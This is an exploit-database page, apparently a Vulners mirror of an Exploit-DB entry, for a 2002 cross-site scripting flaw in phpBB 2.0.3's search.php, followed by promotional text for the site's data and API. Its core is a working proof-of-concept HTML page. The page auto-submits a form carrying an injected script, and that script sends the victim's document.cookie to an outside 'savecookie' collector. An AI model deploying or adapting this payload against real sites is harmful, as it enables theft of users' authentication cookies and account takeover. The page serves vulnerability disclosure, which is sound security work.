Lucene search
K

phpBB 2.0.3 - 'search.php' Cross-Site Scripting

🗓️ 03 Dec 2002 00:00:00Reported by f_a_aType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

phpBB 2.0.3 contains cross-site scripting vulnerability in search.php script due to input sanitization issues.

Code
source: https://www.securityfocus.com/bid/6311/info

phpBB is vulnerable to cross site scripting attacks. This is due to insufficient santization of user-supplied input. The problem is located in the search.php script. This issue may be exploited by an attacker to steal a legitimate users cookie-based authentication credentials.

<html>
<body>
<form method="post" name="search"
action="http://target/search.php?mode=searchuser">
<input type="hidden" name="search_username" value=""/>

</form>
<SCRIPT>
search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script\>';
document.search.submit();
</script>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Dec 2002 00:00Current
7.4High risk
Vulners AI Score7.4
23